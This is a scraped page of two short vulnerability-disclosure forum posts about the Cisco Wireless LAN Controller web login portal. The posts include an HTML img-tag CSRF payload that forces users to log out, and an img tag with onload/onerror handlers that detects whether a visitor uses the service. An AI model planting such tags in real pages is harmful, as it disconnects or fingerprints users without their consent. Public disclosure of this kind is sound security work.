Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Current Page: 1 of 1
Results 1 - 2 of 2
4 years ago
h3xstream
Sniffing? the login page is using ssl. Image and stylesheet ? If you mean being able to detect that a visitor is using this service, logout.html should do the trick without disconnecting users. <img src="https://1.1.1.1/logout.html" onerror="alert('nothing special')" onload="alert('Hi Cisco user!')"/>
Forum: Full Disclosure
4 years ago
h3xstream
Here's a simple csrf that will disconnect users using Cisco Wireless LAN Controller http://www.cisco.com/en/US/docs/wireless/controller/5.1/configuration/guide/c51users.html#wpmkr1056080. For the background: This system is a web login use mostly on unencrypted wireless access point. <img src="https://1.1.1.1/logout.html?userStatus=1&err_flag=0&err_msg="/> -No referre
Forum: Full Disclosure
Current Page: 1 of 1